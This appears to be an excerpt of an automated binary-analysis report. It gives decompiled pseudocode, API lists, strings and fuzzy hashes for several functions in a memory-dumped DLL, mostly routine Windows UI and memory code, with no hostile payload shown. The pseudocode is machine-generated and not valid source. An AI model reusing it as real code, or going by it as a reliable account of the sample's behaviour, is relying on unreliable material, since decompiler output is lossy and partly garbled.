Instruction Fuzzy Hash: 5BA17C75508381AFE321DF24C841BABBBE8FF95384F000A1DF5D596295DBB1A508CB63

Uniqueness

Uniqueness Score: -1.00%

Function 10003275, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 209
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E10003275(intOrPtr* __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				void* _v16;
				struct tagRECT _v36;
				char _v40;
				char _v44;
				CHAR* _v48;
				void* _v52;
				signed int _v56;
				void* _v60;
				char _v64;
				char _v68;
				char _v76;
				char _v80;
				intOrPtr _v88;
				intOrPtr _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t74;
				void* _t95;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t98;
				void* _t113;
				void* _t132;
				void* _t164;
				void* _t165;
				signed short _t166;
				void* _t167;
				intOrPtr* _t172;
				signed int _t175;
				void* _t178;

				_t178 = __eflags;
				_t164 = __edx;
				_t135 = __ecx;
				_push(0xffffffff);
				_push(E10026110);
				_push( *[fs:0x0]);
				_push(_t132);
				_push(_t165);
				_t74 =  *0x10031c30; // 0x1f496801
				_push(_t74 ^ (_t175 & 0xfffffff8) - 0x00000030);
				 *[fs:0x0] =  &_v16;
				_t172 = __ecx;
				E1000D42C(_t132, __ecx, _t165);
				_t166 = E1000DA85(0, _t135, _t165, _t172, _t178, GetSystemMenu( *(_t172 + 0x20), 0));
				_v56 = _t166;
				E10001F42( &_v52, E1000517E());
				_v16 = 0;
				E10001D3A( &_v56, 0x65);
				if( *((intOrPtr*)(_v60 - 0xc)) != 0) {
					AppendMenuA( *(_t166 + 4), 0x800, 0, 0);
					AppendMenuA( *(_v52 + 4), 0, 0x10, _v48);
				}
				_t167 = SendMessageA;
				SendMessageA( *(_t172 + 0x20), 0x80, 1,  *(_t172 + 0x120));
				SendMessageA( *(_t172 + 0x20), 0x80, 0,  *(_t172 + 0x120));
				GetWindowRect( *(_t172 + 0x20),  &_v36);
				 *((intOrPtr*)(_t172 + 0x128)) = 0;
				 *((intOrPtr*)(_t172 + 0x12c)) = _v36.right - _v36.left;
				 *((intOrPtr*)(_t172 + 0x130)) = _v36.bottom - _v36.top;
				E10001F42( &_v60, E1000517E());
				_v12 = 1;
				_t95 = E10001D3A( &_v64, 0x66);
				_t180 = _t95;
				if(_t95 == 0) {
					E10002103(0,  &_v60, "AppUnknown");
				}
				_t96 = E10003B46(_t180, 0x14);
				_v52 = _t96;
				_v8 = 2;
				if(_t96 == 0) {
					_t97 = 0;
					__eflags = 0;
				} else {
					_t97 = E10006059(_t96, _t167, _v60, 1, 0, 0, 0, 0);
				}
				_v8 = 1;
				 *((intOrPtr*)(_t172 + 0x124)) = _t97;
				_t182 = _t97;
				if(_t97 == 0) {
					E100055D6(0, _t164, _t167, _t172, _t182);
					 *((intOrPtr*)( *_t172 + 0x15c))(0x67, 0, 0xffffffff);
				}
				_t98 = E10003B46(_t182, 8);
				_v52 = _t98;
				_v8 = 3;
				_t183 = _t98;
				if(_t98 == 0) {
					_v52 = 0;
				} else {
					_v52 = E10003C6E(_t98);
				}
				_v8 = 1;
				E1000404F(0, _v52, _t183, 0x10, 0xf, 1, 3, 2);
				_v60 = 0;
				_v64 = 0x100288f0;
				_v36.right = 4;
				_v76 = 0x81;
				do {
					E1000CD52(0,  &_v44, _t167, LoadBitmapA( *(E10006DEC(0, _t167, _t172, _t183) + 0xc), _v56 & 0x0000ffff));
					_push(_v44);
					_push( *((intOrPtr*)(_v56 + 4)));
					E1000238C(0,  *((intOrPtr*)( *((intOrPtr*)(E10006DEC(0, _t167, _t172, _t183) + 0x78)))), _t167, _t172, _t183);
					E1000CDAA( &_v56);
					_v68 = _v68 + 1;
					_t184 = _v68 - 0x83;
				} while (_v68 <= 0x83);
				E10003F90(0,  &_v56, _t167, _t172, _t184, SendMessageA( *(_t172 + 0x94), 0x1109, 0,  *(_v60 + 4)));
				_push(0);
				_t113 = E10001C4E(0,  &_v68, _t167, _t172, _t184);
				_v36.bottom = 5;
				E10001279(0, _t164, _t172 + 0x74, _t184, _t113);
				_v36.right = 4;
				E100010A3(_v76 + 0xfffffff0, _t164);
				_t173 = _t172 + 0xcc;
				E1000CF80(_t172 + 0xcc, 0,  &_v80);
				E1000C384(_t172 + 0xcc, _v88);
				_v40 = 1;
				_v76 = 0x100288f0;
				E1000246E(0,  &_v76, _t164, _t172 + 0x74, _t173, _t184);
				E100010A3(_v92 + 0xfffffff0, _t164);
				E100010A3(_v80 + 0xfffffff0, _t164);
				 *[fs:0x0] = _v48;
				return 1;
			}

0x10003275
0x10003275
0x10003275
0x1000327b
0x1000327d
0x10003288
0x1000328c
0x1000328e
0x1000328f
0x10003296
0x1000329b
0x100032a1
0x100032a3
0x100032ba
0x100032bc
0x100032ca
0x100032d5
0x100032d9
0x100032e7
0x100032f9
0x10003309
0x10003309
0x10003311
0x10003321
0x10003332
0x1000333c
0x1000334a
0x10003350
0x1000335e
0x1000336e
0x10003379
0x1000337e
0x10003383
0x10003385
0x10003390
0x10003390
0x10003397
0x1000339d
0x100033a1
0x100033a8
0x100033bd
0x100033bd
0x100033aa
0x100033b6
0x100033b6
0x100033bf
0x100033c4
0x100033ca
0x100033cc
0x100033d3
0x100033dc
0x100033dc
0x100033e4
0x100033ea
0x100033ee
0x100033f3
0x100033f5
0x10003404
0x100033f7
0x100033fe
0x100033fe
0x10003410
0x1000341b
0x10003420
0x10003424
0x1000342c
0x10003431
0x10003439
0x10003453
0x1000345c
0x10003463
0x1000346e
0x10003477
0x1000347c
0x10003480
0x10003480
0x100034a0
0x100034a5
0x100034aa
0x100034b5
0x100034ba
0x100034bf
0x100034cb
0x100034d5
0x100034de
0x100034e9
0x100034ee
0x100034f7
0x100034ff
0x1000350b
0x10003517
0x10003523
0x10003531

APIs

GetSystemMenu.USER32(?,00000000,1F496801), ref: 100032AE
AppendMenuA.USER32 ref: 100032F9
AppendMenuA.USER32 ref: 10003309
SendMessageA.USER32 ref: 10003321
SendMessageA.USER32 ref: 10003332
GetWindowRect.USER32 ref: 1000333C
LoadBitmapA.USER32 ref: 10003448
SendMessageA.USER32 ref: 1000349D

Strings

AppUnknown, xrefs: 10003387

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: MenuMessageSend$Append$BitmapLoadRectSystemWindow
String ID: AppUnknown
API String ID: 3476546122-838211464
Opcode ID: 3c3d84b42a8a373a7c294d1055c2976db7b6275533254816e329f91f90264a58
Instruction ID: 9f719ab319242455eeec2c0db9e4cd4cefe01a064806a08bd7beb61fb60dea27
Opcode Fuzzy Hash: 3c3d84b42a8a373a7c294d1055c2976db7b6275533254816e329f91f90264a58
Instruction Fuzzy Hash: 0A81AD752083409FE311DF64CC85F5BBBE9FF88394F004A2DF299972A6CB71A9448B52

Uniqueness

Uniqueness Score: -1.00%

Function 1000ACF4, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000ACF4(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				void* _t40;
				void* _t43;
				void* _t61;
				void* _t65;
				struct HWND__* _t67;
				CHAR* _t69;
				void* _t72;

				_t65 = __edx;
				_t61 = __ecx;
				_push(0x40);
				E100139AB(E1002586F, __ebx, __edi, __esi);
				_t67 =  *(_t72 + 8);
				_t69 = "AfxOldWndProc423";
				_t31 = GetPropA(_t67, _t69);
				 *(_t72 - 0x14) =  *(_t72 - 0x14) & 0x00000000;
				 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
				 *(_t72 - 0x18) = _t31;
				_t59 = 1;
				_t33 =  *(_t72 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E1000953E(1, _t61,  *(_t72 + 0x14));
					E1000AC04(_t61, E1000953E(1, _t61, _t67),  *(_t72 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t59 = 0 | E1000AC7C(1, _t67, E1000953E(1, _t61, _t67),  *(_t72 + 0x14),  *(_t72 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t59 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t67, 0xfffffffc,  *(_t72 - 0x18));
							RemovePropA(_t67, _t69);
							GlobalDeleteAtom(GlobalFindAtomA(_t69) & 0x0000ffff);
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								 *(_t72 - 0x14) = CallWindowProcA( *(_t72 - 0x18), _t67,  *(_t72 + 0xc),  *(_t72 + 0x10),  *(_t72 + 0x14));
							} else {
								E1000826F(E1000953E(1, _t61, _t67), _t72 - 0x30, _t72 - 0x20);
								 *(_t72 - 0x14) = CallWindowProcA( *(_t72 - 0x18), _t67, 0x110,  *(_t72 + 0x10),  *(_t72 + 0x14));
								E10009B27(1, _t65, _t50, _t72 - 0x30,  *((intOrPtr*)(_t72 - 0x20)));
							}
						}
					}
				}
				return E10013A50( *(_t72 - 0x14));
			}

0x1000acf4
0x1000acf4
0x1000acf4
0x1000acfb
0x1000ad00
0x1000ad03
0x1000ad0a
0x1000ad10
0x1000ad14
0x1000ad18
0x1000ad20
0x1000ad21
0x1000ad24
0x1000add0
0x1000ade2
0x00000000
0x1000ad2a
0x1000ad2a
0x1000ad2d
0x1000adc8
0x1000ade7
0x1000ade9
0x00000000
0x00000000
0x1000ad2f
0x1000ad2f
0x1000ad32
0x1000ad8b
0x1000ad93
0x1000ada4
0x00000000
0x1000ad34
0x1000ad39
0x1000adeb
0x1000adfe
0x1000ad3f
0x1000ad50
0x1000ad6d
0x1000ad75
0x1000ad75
0x1000ad39
0x1000ad32
0x1000ad2d
0x1000ad82

APIs

__EH_prolog3_catch.LIBCMT ref: 1000ACFB
GetPropA.USER32 ref: 1000AD0A
CallWindowProcA.USER32 ref: 1000AD64

Part of subcall function 10009B27: GetWindowRect.USER32 ref: 10009B51

SetWindowLongA.USER32(?,000000FC,?), ref: 1000AD8B
RemovePropA.USER32 ref: 1000AD93
GlobalFindAtomA.KERNEL32 ref: 1000AD9A
GlobalDeleteAtom.KERNEL32(?), ref: 1000ADA4
CallWindowProcA.USER32 ref: 1000ADF8

Strings

AfxOldWndProc423, xrefs: 1000AD03, 1000AD08, 1000AD91, 1000AD99

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
String ID: AfxOldWndProc423
API String ID: 2109165785-1060338832
Opcode ID: e394df849a843b14d8614e7f0629cef4412a1bece112dfd84d1004ffb2607ab9
Instruction ID: be4e7e708b459df902e16e0952a4f3276ec29baeab73e630cb2fead3cfa4035a
Opcode Fuzzy Hash: e394df849a843b14d8614e7f0629cef4412a1bece112dfd84d1004ffb2607ab9
Instruction Fuzzy Hash: D231753280011AABEF01DFA4DD8ADBF7BB8FF06292F104119F902A5465CB359A51DB61

Uniqueness

Uniqueness Score: -1.00%

Function 10003626, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 226
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E10003626(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t85;
				int _t102;
				void* _t109;
				void* _t115;
				void* _t122;
				intOrPtr _t126;
				void* _t135;
				void* _t138;
				void* _t150;
				intOrPtr* _t155;
				intOrPtr* _t156;
				void* _t192;
				void* _t194;
				void* _t196;
				intOrPtr _t199;
				void* _t200;
				signed int _t201;
				void* _t203;

				_t192 = __edx;
				_t201 = _t203 - 0x3fc;
				_t85 =  *0x10031c30; // 0x1f496801
				 *(_t201 + 0x400) = _t85 ^ _t201;
				_push(0x2c);
				E100139AB(E100260B6, __ebx, __edi, __esi);
				_t199 = __ecx;
				 *((intOrPtr*)(_t201 - 0x28)) = __ecx;
				E10001F42(_t201 - 0x18, E1000517E());
				 *((intOrPtr*)(_t201 - 4)) = 0;
				E10001F42(_t201 - 0x1c, E1000517E());
				 *((char*)(_t201 - 4)) = 1;
				E10001F42(_t201 - 0x20, E1000517E());
				 *((char*)(_t201 - 4)) = 2;
				_t155 =  *((intOrPtr*)(__ecx + 0x128));
				if(_t155 != 0) {
					 *((intOrPtr*)( *_t155 + 0xc))();
				}
				_t156 =  *((intOrPtr*)(_t199 + 0x128));
				if(_t156 != 0) {
					 *((intOrPtr*)( *_t156 + 4))(1);
				}
				 *((intOrPtr*)(_t199 + 0x128)) = 0;
				E1000A5FB(_t199 + 0xcc, _t201 - 0x18);
				_t194 = SendMessageA;
				 *(_t201 - 0x14) = SendMessageA( *(_t199 + 0xec), 0x146, 0, 0);
				E10001F42(_t201 - 0x24, E1000517E());
				 *((char*)(_t201 - 4)) = 3;
				while( *(_t201 - 0x14) > 0) {
					 *(_t201 - 0x14) =  *(_t201 - 0x14) - 1;
					E1000CF80(_t199 + 0xcc,  *(_t201 - 0x14), _t201 - 0x24);
					_t102 = E10001EA7(_t201 - 0x18, _t199, _t201,  *((intOrPtr*)(_t201 - 0x24)));
					__eflags = _t102;
					if(_t102 == 0) {
						SendMessageA( *(_t199 + 0xec), 0x144,  *(_t201 - 0x14), 0);
						 *(_t201 - 0x14) = 0;
					}
				}
				SendMessageA( *(_t199 + 0xec), 0x14a, 0,  *(_t201 - 0x18));
				if(SendMessageA( *(_t199 + 0xec), 0x146, 0, 0) > 5) {
					SendMessageA( *(_t199 + 0xec), 0x144, 5, 0);
				}
				_t109 = E1000618F(_t192, _t194,  *(_t201 - 0x18), _t201 - 0x34, _t201 - 0x1c, _t201 - 0x20, _t201 - 0x30);
				_t211 = _t109;
				if(_t109 != 0) {
					L14:
					E100045E3( *((intOrPtr*)(E10006DEC(0, _t194, _t199, __eflags) + 4)));
					 *((char*)(_t201 - 4)) = 6;
					E1000C384(_t199 + 0xcc,  *(_t201 - 0x18));
					SendMessageA( *(_t199 + 0xec), 0x142, 0, 0xffffffff);
					__eflags =  *((intOrPtr*)(_t201 - 0x34)) - 1;
					if(__eflags != 0) {
						L17:
						_push(0xffffffff);
						_push(0);
						_push(0x69);
						E100055D6(0, _t192, _t194, _t199, __eflags);
						L18:
						_t163 =  *((intOrPtr*)(_t199 + 0x128));
						__eflags =  *((intOrPtr*)(_t199 + 0x128));
						if(__eflags == 0) {
							_push(0);
							_t115 = E10001C4E(0, _t201 - 0x14, _t194, _t199, __eflags);
							_t195 = _t199 + 0x74;
							 *((char*)(_t201 - 4)) = 9;
							E10001279(0, _t192, _t199 + 0x74, __eflags, _t115);
							__eflags =  *(_t201 - 0x14) + 0xfffffff0;
							E100010A3( *(_t201 - 0x14) + 0xfffffff0, _t192);
						} else {
							_t195 = _t199 + 0x74;
							E10001279(_t163, _t192, _t199 + 0x74, __eflags, _t201 - 0x20);
						}
						 *((char*)(_t201 - 4)) = 3;
						E100010F6(0, _t201 - 0x29, _t192, _t195, _t199, __eflags);
						goto L22;
					}
					_t126 =  *((intOrPtr*)(_t201 - 0x1c));
					__eflags =  *((intOrPtr*)(_t126 - 0xc));
					if(__eflags == 0) {
						goto L17;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *((char*)(_t201 - 4)) = 7;
					_push(_t126);
					 *((intOrPtr*)(_t199 + 0x128)) = E100065A7(0,  *((intOrPtr*)(_t199 + 0x124)), _t194, _t199, __eflags);
					 *((intOrPtr*)(_t201 - 4)) = 6;
					goto L18;
				} else {
					_push("ftp://");
					E10001C4E(0, _t201 - 0x14, _t194, _t199, _t211);
					 *((char*)(_t201 - 4)) = 4;
					E10003A1D(_t201 - 0x14,  *(_t201 - 0x18),  *((intOrPtr*)( *(_t201 - 0x18) - 0xc)));
					_t135 = E1000618F(_t192, _t194,  *(_t201 - 0x14), _t201 - 0x34, _t201 - 0x1c, _t201 - 0x20, _t201 - 0x30);
					_t212 = _t135;
					if(_t135 != 0) {
						 *((char*)(_t201 - 4)) = 3;
						__eflags =  *(_t201 - 0x14) + 0xfffffff0;
						E100010A3( *(_t201 - 0x14) + 0xfffffff0, _t192);
						goto L14;
					}
					_push(0xffffffff);
					_push(0);
					_push(0x69);
					E100055D6(0, _t192, _t194, _t199, _t212);
					_push(0);
					_t138 = E10001C4E(0, _t201 - 0x28, _t194, _t199, _t212);
					 *((char*)(_t201 - 4)) = 5;
					E10001279(0, _t192, _t199 + 0x74, _t212, _t138);
					E100010A3( *((intOrPtr*)(_t201 - 0x28)) + 0xfffffff0, _t192);
					E100010A3( *(_t201 - 0x14) + 0xfffffff0, _t192);
					L22:
					E100010A3( *((intOrPtr*)(_t201 - 0x24)) + 0xfffffff0, _t192);
					E100010A3( *((intOrPtr*)(_t201 - 0x20)) + 0xfffffff0, _t192);
					E100010A3( *((intOrPtr*)(_t201 - 0x1c)) + 0xfffffff0, _t192);
					_t122 = E100010A3( *(_t201 - 0x18) + 0xfffffff0, _t192);
					 *[fs:0x0] =  *((intOrPtr*)(_t201 - 0xc));
					_pop(_t196);
					_pop(_t200);
					_pop(_t150);
					return E100127FF(_t122, _t150,  *(_t201 + 0x400) ^ _t201, _t192, _t196, _t200);
				}
			}

0x10003626
0x1000362d
0x10003631
0x10003638
0x1000363e
0x10003645
0x1000364a
0x1000364c
0x10003658
0x1000365f
0x1000366b
0x10003670
0x1000367d
0x10003682
0x10003686
0x1000368e
0x10003692
0x10003692
0x10003695
0x1000369d
0x100036a3
0x100036a3
0x100036b0
0x100036b6
0x100036bb
0x100036d0
0x100036dc
0x100036e1
0x1000371f
0x100036e7
0x100036f7
0x10003702
0x10003707
0x10003709
0x1000371a
0x1000371c
0x1000371c
0x10003709
0x10003733
0x10003747
0x10003757
0x10003757
0x1000376c
0x10003771
0x10003773
0x10003801
0x10003809
0x1000380e
0x1000381b
0x1000382e
0x10003830
0x10003834
0x100038ba
0x100038ba
0x100038bc
0x100038bd
0x100038bf
0x100038c4
0x100038c4
0x100038ca
0x100038cc
0x100038dc
0x100038e0
0x100038e6
0x100038eb
0x100038ef
0x100038f7
0x100038fa
0x100038ce
0x100038d2
0x100038d5
0x100038d5
0x10003902
0x10003906
0x00000000
0x10003906
0x1000383a
0x1000383d
0x10003840
0x00000000
0x00000000
0x10003842
0x10003843
0x10003844
0x10003845
0x10003846
0x10003850
0x10003856
0x1000385c
0x00000000
0x10003779
0x10003779
0x10003781
0x10003786
0x10003794
0x100037ac
0x100037b1
0x100037b3
0x100037f2
0x100037f9
0x100037fc
0x00000000
0x100037fc
0x100037b5
0x100037b7
0x100037b8
0x100037ba
0x100037bf
0x100037c3
0x100037ce
0x100037d2
0x100037dd
0x100037e8
0x1000390b
0x10003911
0x1000391c
0x10003927
0x10003932
0x1000393a
0x10003942
0x10003943
0x10003944
0x10003959
0x10003959

APIs

__EH_prolog3_catch.LIBCMT ref: 10003645
SendMessageA.USER32 ref: 100036CE
SendMessageA.USER32 ref: 1000371A
SendMessageA.USER32 ref: 10003733
SendMessageA.USER32 ref: 10003742
SendMessageA.USER32 ref: 10003757
SendMessageA.USER32 ref: 1000382E

Strings

ftp://, xrefs: 10003779

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$H_prolog3_catch
String ID: ftp://
API String ID: 489504421-2553531909
Opcode ID: 272401093c3ab956011e4c52a105766a575f62708e66eff8141f9af9dc4c214d
Instruction ID: e0ff17af1ed1de507ee87781691463f0ed442e41965faeb0fcb00a0cafb86eed
Opcode Fuzzy Hash: 272401093c3ab956011e4c52a105766a575f62708e66eff8141f9af9dc4c214d
Instruction Fuzzy Hash: 5381CB71900249AFEB05DBA4CD91EEFB7B9EF04394F208229F216761D5DB716E44CB21

Uniqueness

Uniqueness Score: -1.00%

Function 1001149A, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E1001149A(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x10031c30; // 0x1f496801
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E100127FF(E10011346(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

0x100114a2
0x100114a9
0x100114ae
0x100114b7
0x100114ba
0x100114bd
0x100114c2
0x100114c6
0x100114d0
0x100114df
0x100114e3
0x100114f0
0x100114f2
0x100114f4
0x100114f4
0x1001150f
0x10011512
0x10011512
0x10011518
0x10011518
0x1001151e
0x10011520
0x10011520
0x1001153b
0x1001153b
0x100114ca
0x100114ce
0x00000000
0x00000000
0x00000000

APIs

GetStockObject.GDI32(00000011), ref: 100114C2
GetStockObject.GDI32(0000000D), ref: 100114CA
GetObjectA.GDI32(00000000,0000003C,?), ref: 100114D7
GetDC.USER32(00000000), ref: 100114E6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 100114FA
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 10011506
ReleaseDC.USER32 ref: 10011512

Strings

System, xrefs: 100114BD, 10011527

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: ade681fd76742538917e2ff8be4f3638d3a51b999da6fa1120420ad330cb864b
Instruction ID: 268481f451d9d9cd4d3db118bdb4f38a3205006005ce694a5800312ec44427b6
Opcode Fuzzy Hash: ade681fd76742538917e2ff8be4f3638d3a51b999da6fa1120420ad330cb864b
Instruction Fuzzy Hash: F2114271641268EBEB14DBA5CC85FEE77B8FB44781F100015FA05AA1C1DB70DD46DB60

Uniqueness

Uniqueness Score: -1.00%

Function 100109F9, Relevance: 13.6, APIs: 9, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E100109F9(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E100139AB(E10025D0B, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E100106EA(0x10);
						__eflags = _t39;
						if(__eflags == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x10029284;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						_t51 =  &(_t62[5]);
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E1001081C( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							_t75 =  *(_t65 + 0xc);
							if( *(_t65 + 0xc) != 0) {
								_t41 = E1000522E(_t51, _t65, __eflags, _t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E1000522E(_t51, _t65, _t75, _t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							_t76 = _t42;
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E100056F5(0, _t53, _t62, _t65, _t76);
							}
							 *(_t65 + 0xc) = _t42;
							E10013A90(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					_push( *(_t66 - 0x14));
				}
				LeaveCriticalSection();
				return E10013A50(_t36);
			}

0x100109f9
0x10010a00
0x10010a05
0x10010a07
0x10010a0a
0x10010a0e
0x10010a11
0x10010a17
0x10010a1e
0x10010b1f
0x10010a2d
0x10010a35
0x10010a39
0x10010a6d
0x10010a70
0x10010a75
0x10010a77
0x10010a83
0x10010a83
0x10010a79
0x10010a79
0x10010a7f
0x10010a7f
0x10010a85
0x10010a8a
0x10010a8d
0x10010a90
0x10010a93
0x00000000
0x10010a3b
0x10010a3b
0x10010a41
0x10010a50
0x10010a50
0x10010a53
0x10010ab7
0x10010abd
0x10010ac2
0x10010a55
0x10010a5a
0x10010a60
0x10010a63
0x10010a63
0x10010ac8
0x10010aca
0x10010acf
0x10010ad5
0x10010ad5
0x10010add
0x10010aee
0x10010afa
0x10010aff
0x10010b05
0x10010b05
0x10010a41
0x10010b08
0x10010b0d
0x10010b17
0x10010b17
0x10010b1a
0x10010b1a
0x10010b20
0x10010b2b

APIs

__EH_prolog3_catch.LIBCMT ref: 10010A00
EnterCriticalSection.KERNEL32(?,00000010,10010BC9,?,00000000,?,00000004,10006DFB,10005749,100012B7,1F496801), ref: 10010A11
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,10006DFB,10005749,100012B7,1F496801), ref: 10010A2F
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,10006DFB,10005749,100012B7,1F496801), ref: 10010A63
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10006DFB,10005749,100012B7,1F496801), ref: 10010ACF
_memset.LIBCMT ref: 10010AEE
TlsSetValue.KERNEL32(?,00000000,1F496801), ref: 10010AFF
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10006DFB,10005749,100012B7,1F496801), ref: 10010B20

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
